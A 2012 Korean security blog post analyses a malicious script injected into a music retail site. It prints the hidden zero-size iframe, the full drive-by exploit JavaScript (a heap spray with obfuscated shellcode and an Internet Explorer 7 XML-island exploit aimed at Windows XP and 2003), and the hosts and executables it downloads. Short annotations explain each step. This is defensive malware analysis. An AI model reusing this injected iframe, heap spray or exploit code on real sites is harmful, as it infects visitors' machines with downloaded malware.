'악성스크립트 유포중!'에 해당되는 글 1건

  1. 2012.12.08 음반사이트 → http://www.leesmusic.co.kr (리스뮤직) 악성스크립트 유포중!
posted by Kwan's 2012. 12. 8. 16:13

발견지 : http://www.leesmusic.co.kr [리스뮤직]

            →http://www.leesmusic.co.kr/./lees/index.php 

              (<iframe src=http://seoul-kla.com/admin/data/webedit/1.htm width=0 height=0></iframe>)

               →http://www.7iaa.com/index.html (서버죽음)

               →http://seoul-kla.com/admin/data/webedit/1.htm

                 http://www.baikec.cn/down/ko.exe(복호화 최종파일)

                → http://seoul-kla.com/admin/data/webedit/svchsot.exe(스크립트 내 연결 파일)


<http://seoul-kla.com/admin/data/webedit/1.htm>


if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)location.replace

("about:blank");

~>user agent의 정보얻은후 msie 7 ->location.replace about:blank


function sleep(milliseconds)

{

var start=new Date().getTime();


for(var i=0;i<1e7;i++)

{if((new Date().getTime()-start)>milliseconds)

{break}

}

}


function spray(sc)

{

var infect=unescape(sc.replace(/dadong/g,"\x25\x75"));

~> dadong -> %u replace


var heapBlockSize=0x100000;

var payLoadSize=infect.length*2;

var szlong=heapBlockSize-(payLoadSize+0x038);

var retVal=unescape("%u0a0a%u0a0a");

retVal=getSampleValue(retVal,szlong);

aaablk=(0x0a0a0a0a-0x100000)/heapBlockSize;

zzchuck=new Array();

for(i=0;i<aaablk;i++){zzchuck[i]=retVal+infect}

}


function getSampleValue(retVal,szlong)

{

while(retVal.length*2<szlong)

{retVal+=retVal}

retVal=retVal.substring(0,szlong/2);

return retVal

}


var a1="dadong";

spray

(a1+"9090"+a1+"dadong9090dadong9090dadongE1D9dadong34D9dadong5824dadon

g5858dadong3358dadongB3DBdadong031Cdadong31C3dadong66C9dadongE981

dadongFA65dadong3080dadong4021dadongFAE2dadong17C9dadong2122

dadong4921[생략]dadong2121dadong2121

dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121

dadong2121dadong2

121dadong2121dadong0021");


~> dadong -> %u replace-> http://www.baikec.cn/down/ko.exe 연결!


sleep(3000);


nav=navigator.userAgent.toLowerCase();

if(navigator.appVersion.indexOf('MSIE')!=-1)

{

version=parseFloat(navigator.appVersion.split('MSIE')[1])

~> MSIE 버전 확인


}

if(version==7)

{

w2k3=((nav.indexOf('windows nt 5.2')!=-1)||(nav.indexOf('windows 2003')!=-1));

wxp=((nav.indexOf('windows nt 5.1')!=-1)||(nav.indexOf('windows xp')!=-1));

if(wxp||w2k3)document.write('<XML ID=I><X><C><![CDATA[<image 

SRC=http://&#114;&#2570;&#114;.book.com 

~> MSIE 7 버전 확인 -> 시스템 정보 확인 (windows 2003, windows xp) -> xml 취약점 실행!


src="http://seoul-kla.com/admin/data/webedit/svchsot.exe"]]><![CDATA[>]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C 

DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C 

DATAFORMATAS=HTML></SPAN>');

var i=1;while(i<=10)

{

window.status=" ";i++}

}


요즘에 잠잠했던 xml 취약점을 이용하여 악성코드를 유포하는 방식을 오랜만에 보았다!

ie 버전과 시스템 버전을 확인하여 유포할수도 있고 쉘코드에서도 유포할 수 있는 방식이 사용된걸 볼 수있었다.

현재는 많이 알려져서 패치가 되었지만 그래도 아직까지 사용하는거 보니 패치가 안되어있는 사람도 많은거 같다!


댓글을 달아 주세요